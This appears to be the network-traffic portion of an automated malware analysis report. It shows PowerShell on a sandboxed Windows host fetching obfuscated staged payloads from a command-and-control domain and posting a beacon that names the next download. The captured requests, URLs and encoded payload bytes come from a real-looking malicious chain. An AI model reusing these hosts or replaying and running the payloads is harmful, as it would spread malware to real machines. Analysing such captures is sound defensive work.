                                                                                    Date: Fri, 08 Nov 2024 10:29:32 GMT
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nHS6atd93bshmUNmnnW8bWGIAggnaR89eFmxU4breSyw9Z7ZuRKoFSnnxIS3jfaeaeaqt6tFFXAIyW45F2So%2B2irhCZpbKECG8ffhPr7No9CPpeiOo4PEbiY8jzJN0Zo7Uhnia8PW7ht"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1481&sent=3145&recv=1631&lost=0&retrans=0&sent_bytes=4315745&recv_bytes=26577&delivery_rate=54901617&cwnd=252&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    X-Powered-By: ARR/3.0
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8df4e1ec5c4d6164-ORD
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=121012&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1258&delivery_rate=31581&cwnd=33&unsent_bytes=0&cid=ad5b1eef45e4233b&ts=888&x=0"


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.11.3049767104.21.86.2194438708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-08 10:29:33 UTC370OUTGET /file2/322f9cade6edf27754e99908a3b613cbb2870b90ee66165254085f7c8fc244f7da5e56b571757f523ab1b74f0b2fa31feffd1e9fe8161112e75692567601712fb0e25e562d6b8a48e104a3092fb281311ceea3263b30f8d001611aa592f7120974449bb2c8f98c07211ad54ea73548ef HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                    Host: uyt1n8ded9fb380.com
                                                                                    2024-11-08 10:29:33 UTC1055INHTTP/1.1 200 OK
                                                                                    Date: Fri, 08 Nov 2024 10:29:33 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 2886
                                                                                    Connection: close
                                                                                    content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cVlLAqGKUA6roHQONi%2F1tD7%2F%2BRW9niOkYsNvPRATcOm08HXwodwFQgvzutqnDICwbKZ%2FXMELkiioSnDGr9ukHkeTP5iw%2FJRBVnlmopv1vr8SZ2AQmivjFt6oLh8mqTTwHw3gH1olfJR4"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=42750&sent=71&recv=66&lost=0&retrans=0&sent_bytes=28288&recv_bytes=27343&delivery_rate=3953068&cwnd=254&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    X-Powered-By: ARR/3.0
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8df4e1f35afb4344-EWR
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=102186&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1008&delivery_rate=37393&cwnd=252&unsent_bytes=0&cid=e4c6f122fa85e71d&ts=819&x=0"
                                                                                    2024-11-08 10:29:33 UTC314INData Raw: 25 68 71 65 6f 78 72 62 6c 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 64 6d 5b 70 55 6b 4b 60 60 6a 30 44 54 55 4b 4f 57 46 79 71 55 6a 53 4f 64 6a 34 49 54 6c 6d 4f 63 57 54 7b 55 30 53 53 65 30 71 44 53 55 4b 5b 57 46 72 30 56 55 4b 60 63 54 34 44 55 55 4f 60 53 31 6d 37 56 56 71 4a 63 57 6d 54 50 6c 30 5b 60 6c 65 37 56 6d 65 4e 60 30 6d 75 54 59 71 60 57 30 4b 70 56 6a 65 60 60 44 38 44 55 59 65 60 57 46 75 71 55 32 62 76 52 31 71 49 55 6f 5b 6a 57 7b 54 76 52 54 50 76 5b 31 30 54 50 59 65 51 65 7b 43 4d 53 47 47 77 55 6a 4f 6f 4c 44 75 60 63 6d 5b 30 56 55 4f 52 62
                                                                                    Data Ascii: %hqeoxrbl<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#dm[pUkK``j0DTUKOWFyqUjSOdj4ITlmOcWT{U0SSe0qDSUK[WFr0VUK`cT4DUUO`S1m7VVqJcWmTPl0[`le7VmeN`0muTYq`W0KpVje``D8DUYe`WFuqU2bvR1qIUo[jW{TvRTPv[10TPYeQe{CMSGGwUjOoLDu`cm[0VUORb
                                                                                    2024-11-08 10:29:33 UTC1369INData Raw: 52 6a 65 35 65 6d 6e 76 4c 59 71 60 64 54 47 76 53 47 47 77 55 6a 4f 71 50 56 65 4b 50 31 47 70 52 54 57 4e 65 6c 4b 74 56 6c 79 6b 63 6d 47 6f 56 56 31 34 60 33 57 55 50 6b 43 68 64 54 4b 37 5b 44 69 4a 62 46 4b 75 58 31 34 45 60 54 47 6f 52 54 4f 43 60 33 4c 7b 54 6f 6d 69 57 7b 57 74 54 56 31 34 60 33 57 55 50 55 6d 4b 53 6f 53 37 5b 44 69 4a 62 46 4b 75 5b 46 53 4d 50 30 4b 7b 58 6b 4b 6a 55 6c 4c 78 58 33 65 6c 50 31 4b 44 58 6b 48 30 4c 6d 71 58 52 6b 43 56 53 7b 69 31 54 33 34 4e 65 6c 4b 71 60 7b 65 44 54 56 38 6f 52 54 4f 43 5b 31 71 49 64 49 5b 60 4c 45 47 72 58 7b 4f 4e 60 47 6e 78 57 6f 71 4b 53 45 43 6f 54 54 4f 6f 62 44 38 32 4c 44 75 4b 50 31 47 6f 52 54 4f 52 62 33 48 78 5b 44 34 60 56 44 34 37 56 57 65 6a 63 46 4f 34 50 59 4b 50 54 31 47
                                                                                    Data Ascii: Rje5emnvLYq`dTGvSGGwUjOqPVeKP1GpRTWNelKtVlykcmGoVV14`3WUPkChdTK7[DiJbFKuX14E`TGoRTOC`3L{TomiW{WtTV14`3WUPUmKSoS7[DiJbFKu[FSMP0K{XkKjUlLxX3elP1KDXkH0LmqXRkCVS{i1T34NelKq`{eDTV8oRTOC[1qIdI[`LEGrX{ON`GnxWoqKSECoTTOobD82LDuKP1GoRTORb3Hx[D4`VD47VWejcFO4PYKPT1G
                                                                                    2024-11-08 10:29:33 UTC1203INData Raw: 59 53 56 56 44 71 76 52 54 4f 52 4c 56 4f 75 60 33 65 4c 57 6d 5b 37 56 6d 57 4a 60 46 4c 78 63 46 71 57 53 31 5b 34 58 7b 4b 72 65 57 71 37 62 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4a 53 31 6e 30 5b 44 65 56 50 6c 4f 74 52 6c 69 6d 54 31 44 34 52 54 4f 52 60 6c 48 78 4f 55 43 60 57 7b 54 76 55 46 30 4e 65 6c 4b 74 54 6c 79 68 63 6d 44 32 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 65 60 65 6c 4f 71 50 56 38 4a 53 33 75 6f 54 47 4f 43 65 31 38 34 50 56 75 69 54 31 47 31 58 6a 69 53 5b 31 71 49 52 6b 57 6a 53 30 5b 42 58 33 34 4a 60 46 57 55 4f 54 30 60 57 7b 57 74 5b 44 65 6f 4f 31 6d 45 54 6f 43 4d 64 59 4f 76 52 54 69 7b 5b 31 71 49 52 6b 57 6a 53 30 5b 42 58 33 34 4a 60 46 57 56 62 33 75 69 57 6b 43 6f 54 47 4f 43 60 30 6d 74
                                                                                    Data Ascii: YSVVDqvRTORLVOu`3eLWm[7VmWJ`FLxcFqWS1[4X{KreWq7b14E`TGoRTOC[1mEPVeJS1n0[DeVPlOtRlimT1D4RTOR`lHxOUC`W{TvUF0NelKtTlyhcmD2SGGw[1mEPVeKP1GoRTe`elOqPV8JS3uoTGOCe184PVuiT1G1XjiS[1qIRkWjS0[BX34J`FWUOT0`W{Wt[DeoO1mEToCMdYOvRTi{[1qIRkWjS0[BX34J`FWVb3uiWkCoTGOC`0mt


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.11.3049768104.21.86.2194438708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-08 10:29:34 UTC290OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118a4d29dc2b42a1fdfc3fcf445b5e1ec79 HTTP/1.1
                                                                                    Content-Type: application/json
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                    Host: uyt1n8ded9fb380.com
                                                                                    Content-Length: 308
                                                                                    2024-11-08 10:29:34 UTC308OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 62 65 67 69 6e 20 64 6f 77 6e 6c 6f 61 64 20 68 74 74 70 73 3a 2f 2f 75 79 74 31 6e 38 64 65 64 39 66 62 33 38 30 2e 63 6f 6d 2f 66 69 6c 65 32 2f 65 30 31 32 33 62 62 66 64 64 62 37 36 64 30 61 37 32 31 65 36 39 38 31 32 65 66 33 33 63 34 35 36 61 62 65 63 61 36 37 66 36 61 36 64 65 33 32 31 38 61 34 31 32 31 66 37 36 39 65 66 61 65 63 63 38 34 63 62 33 31 63 39 39 66 36 39 39 39 63 62 65 64 32 62 61 62 39 31 36 39 32 66 66 65 33 66 65 65 63 64 33 30 66 38 62 36 63 64 33 30 66 30 34 61 66 36 30 63 38 64 61 62 65 33 34 66 37 34 66 63 32 35 36 62 33 66 36 65 35 32 65 66 63 33 66 32 31 65 65 64 63 31 36 31 63 31 30 33 33 35 63 37 66 63 30 34 36 31 39 62 34 33 33 34 64 62 32 65 37 39 34 30 64 31 36 61 39 39 63 66 66 34 33 37 64
                                                                                    Data Ascii: [ "\"begin download https://uyt1n8ded9fb380.com/file2/e0123bbfddb76d0a721e69812ef33c456abeca67f6a6de3218a4121f769efaecc84cb31c99f6999cbed2bab91692ffe3feecd30f8b6cd30f04af60c8dabe34f74fc256b3f6e52efc3f21eedc161c10335c7fc04619b4334db2e7940d16a99cff437d
                                                                                    2024-11-08 10:29:35 UTC939INHTTP/1.1 200 OK
                                                                                    Date: Fri, 08 Nov 2024 10:29:34 GMT
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZlEclEW6YEKeQEr%2FlsIHI6znOdIyDyxt7FwUZPe7v2nxUqzJnDWQwZFHan8t%2BEmQoUfTzlAXnoGlGrYO9uZ2jFFy8ATZFDSO37oR2egd9T2pYqUtMkRC96tuOUuUTr95b7PImrWUd0eK"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2281&sent=4652&recv=2401&lost=0&retrans=0&sent_bytes=6488074&recv_bytes=15076&delivery_rate=48152219&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    X-Powered-By: ARR/3.0
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8df4e1fa1e7241e7-EWR
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=102682&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1258&delivery_rate=37223&cwnd=252&unsent_bytes=0&cid=f727eab8cdf74357&ts=833&x=0"


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.11.3049769104.21.86.2194438708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-08 10:29:35 UTC370OUTGET /file2/e0123bbfddb76d0a721e69812ef33c456abeca67f6a6de3218a4121f769efaecc84cb31c99f6999cbed2bab91692ffe3feecd30f8b6cd30f04af60c8dabe34f74fc256b3f6e52efc3f21eedc161c10335c7fc04619b4334db2e7940d16a99cff437db3b2fa0fb83ecdbd3edcdfa830e9 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                    Host: uyt1n8ded9fb380.com
                                                                                    2024-11-08 10:29:35 UTC1054INHTTP/1.1 200 OK
                                                                                    Date: Fri, 08 Nov 2024 10:29:35 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 21778
                                                                                    Connection: close
                                                                                    content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yguWyyiY44W5QbyohOuSqD7DJr%2FJALc0FJDWvThMi9lFjfbZHElny3y%2BI58b%2BGNL6sycn2NA1cLDEl4gAjJfzStEuD53PIWhKtuCwZcMJoergzZdZW4SucTjLX0l3TW6%2BKmelDc1A2DU"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=39980&sent=69&recv=71&lost=0&retrans=0&sent_bytes=22638&recv_bytes=34562&delivery_rate=2419221&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    X-Powered-By: ARR/3.0
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8df4e200deef42b5-EWR
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=108419&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1008&delivery_rate=36583&cwnd=252&unsent_bytes=0&cid=0c1dc0cbee0aea02&ts=588&x=0"
                                                                                    2024-11-08 10:29:35 UTC1369INData Raw: 25 78 76 6a 70 63 78 67 67 72 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 56 56 30 76 63 47 6a 7b 54 56 65 57 4c 33 79 37 5b 44 65 56 65 44 79 72 54 6c 38 6b 63 57 5b 6e 56 6a 65 72 65 57 71 34 4f 54 34 6a 56 47 4b 72 5b 54 4f 6f 60 30 71 75 53 6f 4f 6b 4c 6d 57 7b 52 54 4f 4a 57 47 5b 47 53 6d 4f 56 53 6d 5b 42 54 59 6d 4b 62 44 38 32 4c 44 75 4a 53 32 69 33 56 55 4b 31 50 6d 6a 7b 53 6b 47 69 56 44 71 72 56 6a 57 4e 63 33 47 59 64 46 75 4b 53 45 43 6f 52 6a 62 79 4c 46 57 46 4e 56 71 69 53 33 79 7b 56 6a 4c 30 56 47 6d 59 63 45 43 54 4c 6b 57 72 52 31 53 43 62 44 38 32
                                                                                    Data Ascii: %xvjpcxggr<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#VV0vcGj{TVeWL3y7[DeVeDyrTl8kcW[nVjereWq4OT4jVGKr[TOo`0quSoOkLmW{RTOJWG[GSmOVSm[BTYmKbD82LDuJS2i3VUK1Pmj{SkGiVDqrVjWNc3GYdFuKSECoRjbyLFWFNVqiS3y{VjL0VGmYcECTLkWrR1SCbD82
                                                                                    2024-11-08 10:29:35 UTC1369INData Raw: 4f 4f 5b 33 53 59 53 6c 71 4b 60 6f 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 57 55 4f 52 60 46 4f 74 54 59 53 57 52 44 71 33 56 55 4b 56 64 6c 4f 34 50 56 6d 5b 4c 6b 47 73 55 46 30 56 4f 47 71 55 52 56 65 4c 57 6d 71 72 58 33 30 4b 5b 33 4f 74 57 6f 57 5b 56 44 30 6f 55 47 5b 6a 62 46 4b 75 54 6f 5b 6a 4c 54 35 76 5b 57 65 35 63 44 6d 49 60 49 43 60 53 30 4b 72 58 6c 6d 43 65 47 47 58 52 6c 34 6a 57 7b 47 72 58 6c 34 52 55 56 47 58 55 6b 43 4b 50 33 65 71 55 45 4b 4f 5b 33 4c 7b 54 6c 69 6b 63 6d 47 6f 55 45 48 79 62 46 4b 71 50 56 6d 4b 60 54 6d 71 52 54 69 42 65 6c 50 78 57 6f 6d 6b 4c 6c 69 72 58 6a 65 32 65 57 71 58 60 46 79 4b 50 7b 47 58 58 57 62 30 60 33 48 7b 5b 47 53 6a 52 46 79 7b 56 6d 4f 42 63 33 47 59 54 6c 75 60 57 7b 53 6f 52
                                                                                    Data Ascii: OO[3SYSlqK`oONP3mC[1mEPVeKP1GoWUOR`FOtTYSWRDq3VUKVdlO4PVm[LkGsUF0VOGqURVeLWmqrX30K[3OtWoW[VD0oUG[jbFKuTo[jLT5v[We5cDmI`IC`S0KrXlmCeGGXRl4jW{GrXl4RUVGXUkCKP3eqUEKO[3L{TlikcmGoUEHybFKqPVmK`TmqRTiBelPxWomkLlirXje2eWqX`FyKP{GXXWb0`3H{[GSjRFy{VmOBc3GYTlu`W{SoR
                                                                                    2024-11-08 10:29:35 UTC1369INData Raw: 53 57 55 57 52 54 56 30 6e 50 6d 48 76 63 44 4b 54 63 44 5b 45 58 55 43 46 53 57 47 57 53 6d 71 57 57 54 58 30 54 57 57 6a 52 6d 47 57 4f 57 4b 53 63 56 79 42 54 6a 57 46 50 6d 65 58 5b 44 4b 4e 53 54 5b 48 54 6d 57 46 58 57 47 57 53 6b 5b 53 57 56 53 56 54 57 54 34 50 6d 47 58 62 44 4b 52 4c 46 79 42 57 46 30 6a 50 33 47 73 53 6a 57 60 4c 44 5b 51 56 6b 43 4a 62 47 47 57 5b 47 4b 53 57 6c 79 52 54 57 53 56 50 6d 48 79 53 6a 4b 54 63 44 5b 45 58 55 43 46 53 57 6a 76 53 6a 34 60 4c 44 58 7b 54 57 57 6a 57 6d 47 56 62 46 34 53 57 44 5b 42 54 6a 5b 56 50 6d 65 59 5b 44 4b 4f 57 54 5b 47 54 57 57 46 54 47 57 57 52 6f 4b 53 57 57 4b 52 54 57 54 30 4c 30 47 58 62 44 4b 52 53 6a 5b 42 57 30 5b 46 50 6c 57 73 53 6a 57 57 57 54 5b 50 54 57 57 4a 62 30 47 57 55 6a
                                                                                    Data Ascii: SWUWRTV0nPmHvcDKTcD[EXUCFSWGWSmqWWTX0TWWjRmGWOWKScVyBTjWFPmeX[DKNST[HTmWFXWGWSk[SWVSVTWT4PmGXbDKRLFyBWF0jP3GsSjW`LD[QVkCJbGGW[GKSWlyRTWSVPmHySjKTcD[EXUCFSWjvSj4`LDX{TWWjWmGVbF4SWD[BTj[VPmeY[DKOWT[GTWWFTGWWRoKSWWKRTWT0L0GXbDKRSj[BW0[FPlWsSjWWWT[PTWWJb0GWUj
                                                                                    2024-11-08 10:29:35 UTC1369INData Raw: 54 6d 47 74 62 44 4b 53 4c 44 5b 42 54 7b 4f 6a 50 6a 38 57 53 6a 53 53 57 54 5b 4a 56 6b 43 46 4c 47 47 57 55 59 65 53 57 59 69 52 54 57 69 52 50 6d 47 37 50 6a 4b 54 53 6a 5b 42 5b 44 57 46 53 44 30 47 53 6a 30 57 57 54 58 76 54 57 57 4e 52 6d 47 57 4e 55 4f 53 57 55 57 42 54 57 62 34 50 6d 4b 46 53 6a 4b 55 4c 44 5b 44 54 57 57 46 52 6d 47 57 53 6c 34 53 57 54 34 42 54 57 57 76 50 6d 47 75 4e 54 4b 52 4c 57 5b 42 57 30 5b 46 50 33 44 76 53 6a 69 56 57 54 5b 70 56 6b 43 4a 4f 6d 47 57 55 6a 4b 53 57 6a 4b 52 54 57 65 6a 50 6d 4b 57 53 6a 4b 60 56 46 53 45 55 30 57 46 53 56 4c 76 53 6a 57 57 57 54 5b 4c 54 57 57 4e 50 6d 47 57 63 44 4b 53 57 33 53 42 54 55 43 46 50 6d 4f 73 53 6a 4f 6b 60 31 5b 48 57 6d 57 46 63 47 57 57 53 6c 34 53 57 57 47 32 54 57 57
                                                                                    Data Ascii: TmGtbDKSLD[BT{OjPj8WSjSSWT[JVkCFLGGWUYeSWYiRTWiRPmG7PjKTSj[B[DWFSD0GSj0WWTXvTWWNRmGWNUOSWUWBTWb4PmKFSjKULD[DTWWFRmGWSl4SWT4BTWWvPmGuNTKRLW[BW0[FP3DvSjiVWT[pVkCJOmGWUjKSWjKRTWejPmKWSjK`VFSEU0WFSVLvSjWWWT[LTWWNPmGWcDKSW3SBTUCFPmOsSjOk`1[HWmWFcGWWSl4SWWG2TWW
                                                                                    2024-11-08 10:29:35 UTC1369INData Raw: 59 53 42 54 6b 47 56 50 6d 6a 78 5b 44 4f 6d 60 31 5b 44 54 57 57 46 52 30 47 57 52 6f 5b 53 57 56 53 56 54 57 5b 72 54 6d 47 75 65 44 4b 52 4c 57 5b 42 56 55 4b 6a 50 33 57 73 53 6a 53 53 57 54 5b 4f 57 57 57 4a 53 47 47 57 58 7b 53 53 57 6f 43 42 54 56 71 56 50 6d 44 76 53 6a 4b 55 60 31 5b 45 58 57 57 46 52 44 38 47 53 6c 47 53 57 54 6a 79 54 57 57 47 65 30 47 57 55 6c 34 53 57 33 53 42 54 55 43 46 50 6d 4f 57 53 6a 4b 60 4c 44 5b 44 54 57 57 46 52 6d 47 57 53 6c 34 53 57 54 34 42 54 57 65 60 54 6d 47 57 4f 54 4b 53 57 7b 6d 42 54 30 57 46 50 6d 6e 76 53 6a 53 53 57 54 5b 4a 54 57 57 46 63 6d 47 57 55 6a 4b 53 57 56 79 42 54 57 65 6a 50 6d 48 76 4c 54 4b 59 57 6a 5b 45 55 54 57 46 52 47 53 57 53 6c 69 53 57 54 6a 7b 54 57 57 47 65 30 47 57 55 6c 34 53
                                                                                    Data Ascii: YSBTkGVPmjx[DOm`1[DTWWFR0GWRo[SWVSVTW[rTmGueDKRLW[BVUKjP3WsSjSSWT[OWWWJSGGWX{SSWoCBTVqVPmDvSjKU`1[EXWWFRD8GSlGSWTjyTWWGe0GWUl4SW3SBTUCFPmOWSjK`LD[DTWWFRmGWSl4SWT4BTWe`TmGWOTKSW{mBT0WFPmnvSjSSWT[JTWWFcmGWUjKSWVyBTWejPmHvLTKYWj[EUTWFRGSWSliSWTj{TWWGe0GWUl4S
                                                                                    2024-11-08 10:29:35 UTC1369INData Raw: 44 79 53 6a 4b 59 57 33 53 45 55 6d 57 46 52 57 57 57 53 6c 47 57 57 54 71 45 54 57 57 6e 52 6d 47 59 55 6c 34 53 63 56 69 42 54 31 65 31 50 6d 53 49 5b 44 4f 54 57 54 5b 48 57 6d 57 46 60 57 6e 76 52 6f 57 53 57 56 69 52 54 57 65 46 50 6d 47 54 5b 44 4b 53 4c 44 5b 42 54 33 75 46 50 33 4f 47 53 6a 53 6b 4c 44 5b 4c 5b 45 43 46 65 30 47 57 55 6a 4b 53 57 30 58 7b 54 57 65 6a 50 6d 44 79 53 6a 4b 59 57 33 53 45 55 6d 57 46 52 57 57 57 53 6c 47 57 57 54 71 45 54 57 57 6e 52 6d 47 59 55 6c 34 53 63 56 69 42 54 31 65 31 50 6d 58 7b 5b 44 4b 69 4c 44 5b 48 58 55 43 46 56 57 57 57 53 6c 34 53 57 57 47 32 54 57 57 72 50 6d 47 59 65 44 4b 52 4c 46 79 42 56 6d 5b 46 50 31 30 47 53 6a 69 56 57 54 5b 52 57 57 57 4a 4f 57 47 57 60 44 71 53 57 6c 79 52 54 56 71 56 50
                                                                                    Data Ascii: DySjKYW3SEUmWFRWWWSlGWWTqETWWnRmGYUl4ScViBT1e1PmSI[DOTWT[HWmWF`WnvRoWSWViRTWeFPmGT[DKSLD[BT3uFP3OGSjSkLD[L[ECFe0GWUjKSW0X{TWejPmDySjKYW3SEUmWFRWWWSlGWWTqETWWnRmGYUl4ScViBT1e1PmX{[DKiLD[HXUCFVWWWSl4SWWG2TWWrPmGYeDKRLFyBVm[FP10GSjiVWT[RWWWJOWGW`DqSWlyRTVqVP
                                                                                    2024-11-08 10:29:35 UTC1369INData Raw: 37 58 54 65 56 62 33 4b 45 4f 56 79 6d 53 30 57 71 52 54 4f 43 65 47 47 58 52 6c 34 6a 57 7b 47 72 58 6c 34 52 55 56 47 58 55 6b 43 4b 50 33 65 71 55 47 57 56 65 57 6a 78 4e 56 75 60 57 30 4b 44 58 6b 48 79 65 47 6d 59 4f 56 75 4b 53 6d 58 7b 54 56 71 42 50 6d 48 76 57 6a 4b 5b 4c 6c 53 45 55 54 57 46 53 44 30 47 53 6d 5b 53 57 54 6e 30 54 57 57 6b 4f 47 47 56 63 45 4f 53 63 59 69 42 54 31 54 79 50 6d 6a 7b 5b 44 4b 60 4c 44 5b 44 54 30 57 46 56 6c 50 76 52 6b 43 53 57 56 53 52 54 57 57 35 63 6d 47 75 64 44 4b 55 53 33 53 42 57 33 79 46 50 6c 47 57 53 6a 53 53 57 54 5b 4f 57 57 57 4a 50 30 47 57 60 44 71 53 57 6f 40 7b 54 56 71 46 50 6d 4b 37 50 6a 4b 59 63 44 5b 45 5b 47 57 46 52 57 57 57 53 6d 57 53 57 54 71 32 54 57 57 6e 55 6d 47 59 54 6a 4b 53 57 33
                                                                                    Data Ascii: 7XTeVb3KEOVymS0WqRTOCeGGXRl4jW{GrXl4RUVGXUkCKP3eqUGWVeWjxNVu`W0KDXkHyeGmYOVuKSmX{TVqBPmHvWjK[LlSEUTWFSD0GSm[SWTn0TWWkOGGVcEOScYiBT1TyPmj{[DK`LD[DT0WFVlPvRkCSWVSRTWW5cmGudDKUS3SBW3yFPlGWSjSSWT[OWWWJP0GW`DqSWo@{TVqFPmK7PjKYcD[E[GWFRWWWSmWSWTq2TWWnUmGYTjKSW3
                                                                                    2024-11-08 10:29:35 UTC1369INData Raw: 4e 56 30 69 57 32 69 72 55 56 6a 34 60 6a 30 49 56 6c 71 60 63 54 54 76 55 55 4b 47 4c 54 38 49 54 59 65 4e 53 31 71 71 56 6a 65 56 60 54 30 54 52 55 43 5b 4c 6a 31 31 55 6d 53 4e 60 30 71 54 60 32 6d 5b 64 6c 4f 35 56 6c 71 53 64 44 31 78 54 55 57 51 53 47 44 79 56 6c 30 57 4c 6d 71 54 53 6c 69 4e 60 6c 62 7b 56 6c 71 5b 4f 47 71 70 50 59 71 4e 64 6c 4c 7b 56 6d 65 4b 4c 44 34 59 52 55 53 51 53 31 71 6e 55 6d 65 4e 60 31 30 70 63 46 30 60 57 44 47 34 56 6c 71 57 64 54 30 49 57 55 57 60 57 31 71 71 56 59 71 47 4c 54 30 54 57 59 71 4f 53 30 54 78 55 57 53 57 64 57 71 54 5b 46 69 51 53 30 71 72 55 56 71 43 64 57 71 70 50 6c 30 4f 53 47 54 79 55 30 65 4e 63 44 30 49 55 6c 75 51 57 31 30 37 55 30 53 47 64 57 71 44 60 46 79 5b 64 6c 65 37 56 6c 30 5b 64 6a 30
                                                                                    Data Ascii: NV0iW2irUVj4`j0IVlq`cTTvUUKGLT8ITYeNS1qqVjeV`T0TRUC[Lj11UmSN`0qT`2m[dlO5VlqSdD1xTUWQSGDyVl0WLmqTSliN`lb{Vlq[OGqpPYqNdlL{VmeKLD4YRUSQS1qnUmeN`10pcF0`WDG4VlqWdT0IWUW`W1qqVYqGLT0TWYqOS0TxUWSWdWqT[FiQS0qrUVqCdWqpPl0OSGTyU0eNcD0IUluQW107U0SGdWqD`Fy[dle7Vl0[dj0
                                                                                    2024-11-08 10:29:35 UTC1369INData Raw: 6d 65 46 65 57 71 45 60 33 65 4c 57 6c 53 76 58 6c 30 52 65 6c 50 79 55 6b 43 6d 57 32 69 72 52 54 57 6e 62 47 71 49 54 6c 79 68 60 6f 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 54 5b 44 65 46 64 56 53 45 4c 57 53 68 53 30 5b 72 58 31 4f 43 65 47 54 78 57 6c 71 68 4c 6b 57 73 58 32 6d 43 64 54 38 32 4c 44 75 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4a 53 33 79 37 57 45 43 7b 5b 30 43 55 50 6d 57 60 56 44 35 76 55 47 5b 52 63 46 4b 58 50 6a 65 69 57 32 69 72 54 6d 69 6e 62 46 4c 7b 54 6f 71 53 57 7b 57 73 54 6a 65 56 62 30 71 58 54 6c 79 51 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 53 33 79 75
